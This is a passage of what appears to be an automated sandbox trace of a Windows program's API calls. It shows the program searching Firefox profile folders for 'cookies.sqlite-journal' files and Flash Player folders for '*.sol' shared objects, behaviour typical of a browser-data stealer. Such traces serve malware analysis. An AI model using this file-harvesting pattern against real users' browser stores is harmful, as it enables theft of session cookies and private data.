[0251.388] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c8960 | out: lpFindFileData=0x79c8960) returned 1 [0251.388] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.388] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c8960 | out: lpFindFileData=0x79c8960) returned 1 [0251.388] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.388] lstrlenW (lpString="818200132aebmoouht.files") returned 24 [0251.388] PathCombineW (in: pszDest=0x79c8cc0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", pszFile="818200132aebmoouht.files" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files" [0251.388] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x93 [0251.388] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", lpDst=0x79c9130, nSize=0x93 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned 0x93 [0251.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned 146 [0251.388] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.388] PathCombineW (in: pszDest=0x79c9260, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\cookies.sqlite-journal" [0251.389] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\cookies.sqlite-journal", lpFindFileData=0x79c8ed0 | out: lpFindFileData=0x79c8ed0) returned 0xffffffffffffffff [0251.389] PathCombineW (in: pszDest=0x79c9260, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*" [0251.389] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*", lpFindFileData=0x79c8ed0 | out: lpFindFileData=0x79c8ed0) returned 0x4406a40 [0251.389] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x79c8ed0 | out: lpFindFileData=0x79c8ed0) returned 1 [0251.389] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.389] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x79c8ed0 | out: lpFindFileData=0x79c8ed0) returned 1 [0251.389] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.389] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x79c8ed0 | out: lpFindFileData=0x79c8ed0) returned 1 [0251.389] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.389] lstrlenW (lpString="journals") returned 8 [0251.389] PathCombineW (in: pszDest=0x79c9260, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", pszFile="journals" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals" [0251.389] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x9c [0251.389] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals", lpDst=0x79c96d0, nSize=0x9c | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals") returned 0x9c [0251.389] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals") returned 155 [0251.389] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.389] PathCombineW (in: pszDest=0x79c9810, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\cookies.sqlite-journal" [0251.389] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\cookies.sqlite-journal", lpFindFileData=0x79c9470 | out: lpFindFileData=0x79c9470) returned 0xffffffffffffffff [0251.390] PathCombineW (in: pszDest=0x79c9810, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*" [0251.390] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*", lpFindFileData=0x79c9470 | out: lpFindFileData=0x79c9470) returned 0x4406e00 [0251.390] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c9470 | out: lpFindFileData=0x79c9470) returned 1 [0251.390] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.390] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c9470 | out: lpFindFileData=0x79c9470) returned 0 [0251.390] FindClose (in: hFindFile=0x4406e00 | out: hFindFile=0x4406e00) returned 1 [0251.390] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x79c8ed0 | out: lpFindFileData=0x79c8ed0) returned 0 [0251.390] FindClose (in: hFindFile=0x4406a40 | out: hFindFile=0x4406a40) returned 1 [0251.390] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c8960 | out: lpFindFileData=0x79c8960) returned 1 [0251.390] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.390] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c8960 | out: lpFindFileData=0x79c8960) returned 0 [0251.390] FindClose (in: hFindFile=0x44067a0 | out: hFindFile=0x44067a0) returned 1 [0251.390] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c5910 | out: lpFindFileData=0x79c5910) returned 0 [0251.390] FindClose (in: hFindFile=0x44064a0 | out: hFindFile=0x44064a0) returned 1 [0251.391] FindNextFileW (in: hFindFile=0x4406e60, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0 [0251.391] FindClose (in: hFindFile=0x4406e60 | out: hFindFile=0x4406e60) returned 1 [0251.391] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0 [0251.391] FindClose (in: hFindFile=0x44079a0 | out: hFindFile=0x44079a0) returned 1 [0251.391] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.391] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.391] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.391] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.391] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.391] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.391] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.391] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.391] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0 [0251.391] FindClose (in: hFindFile=0x4406380 | out: hFindFile=0x4406380) returned 1 [0251.391] FindNextFileW (in: hFindFile=0x4407760, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0 [0251.392] FindClose (in: hFindFile=0x4407760 | out: hFindFile=0x4407760) returned 1 [0251.392] mbstowcs (in: _Dest=0x7aae530, _Source="%APPDATA%", _MaxCount=0xa | out: _Dest="%APPDATA%") returned 0x9 [0251.392] lstrcatW (in: lpString1="%APPDATA%", lpString2="\\Macromedia\\Flash Player\\" | out: lpString1="%APPDATA%\\Macromedia\\Flash Player\\") returned="%APPDATA%\\Macromedia\\Flash Player\\" [0251.392] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Macromedia\\Flash Player\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x3f [0251.392] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Macromedia\\Flash Player\\", lpDst=0x7aae580, nSize=0x3f | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned 0x3f [0251.392] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned 62 [0251.392] lstrlenW (lpString="*.sol") returned 5 [0251.392] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\", pszFile="*.sol" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*.sol") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*.sol" [0251.392] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*.sol", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0xffffffffffffffff [0251.392] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*" [0251.392] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0x44067a0 [0251.392] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.392] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.392] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.392] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.392] lstrlenW (lpString="#SharedObjects") returned 14 [0251.393] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\", pszFile="#SharedObjects" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects" [0251.393] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x4d [0251.393] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", lpDst=0x79b1400, nSize=0x4d | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned 0x4d [0251.393] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned 76 [0251.393] lstrlenW (lpString="*.sol") returned 5 [0251.393] PathCombineW (in: pszDest=0x7aaef30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", pszFile="*.sol" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*.sol") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*.sol" [0251.393] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*.sol", lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0xffffffffffffffff [0251.393] PathCombineW (in: pszDest=0x7aaef30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*" [0251.393] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*", lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0x44064a0 [0251.393] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.393] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.393] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.393] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.393] lstrlenW (lpString="DQQHJZ8C") returned 8 [0251.393] PathCombineW (in: pszDest=0x7aaef30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", pszFile="DQQHJZ8C" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C" [0251.393] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x56 [0251.393] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C", lpDst=0x7aaf3a0, nSize=0x56 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C") returned 0x56 [0251.393] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C") returned 85 [0251.393] lstrlenW (lpString="*.sol") returned 5 [0251.394] PathCombineW (in: pszDest=0x79c54a0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C", pszFile="*.sol" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*.sol") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*.sol" [0251.394] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*.sol", lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 0xffffffffffffffff [0251.394] PathCombineW (in: pszDest=0x79c54a0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*" [0251.394] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*", lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 0x4406a40 [0251.394] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.394] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.394] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 0 [0251.394] FindClose (in: hFindFile=0x4406a40 | out: hFindFile=0x4406a40) returned 1 [0251.394] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0 [0251.394] FindClose (in: hFindFile=0x44064a0 | out: hFindFile=0x44064a0) returned 1 [0251.394] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.394] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.394] lstrlenW (lpString="macromedia.com") returned 14 [0251.394] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\", pszFile="macromedia.com" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0251.395] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x4d [0251.395] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpDst=0x79b1400, nSize=0x4d | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned 0x4d [0251.395] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned 76 [0251.395] lstrlenW (lpString="*.sol") returned 5 [0251.395] PathCombineW (in: pszDest=0x7aaef30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="*.sol" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*.sol") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*.sol" [0251.395] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*.sol", lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0xffffffffffffffff [0251.395] PathCombineW (in: pszDest=0x7aaef30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*" [0251.395] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0x4406a40 [0251.395] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.395] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.395] FindNextFileW (in: hFindFile=0x4406a40, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.395] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.395] lstrlenW (lpString="support") returned 7 [0251.395] PathCombineW (in: pszDest=0x7aaef30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="support" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0251.395] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0251.395] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpDst=0x7aaf3a0, nSize=0x55 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned 0x55 [0251.395] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned 84 [0251.395] lstrlenW (lpString="*.sol") returned 5 [0251.395] PathCombineW (in: pszDest=0x79c54a0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="*.sol" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*.sol") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*.sol" [0251.395] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*.sol", lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 0xffffffffffffffff [0251.396] PathCombineW (in: pszDest=0x79c54a0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*" [0251.396] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 0x4406e00 [0251.396] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.396] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.396] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.396] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.396] lstrlenW (lpString="flashplayer") returned 11 [0251.396] PathCombineW (in: pszDest=0x79c54a0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="flashplayer" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0251.396] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0251.396] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash 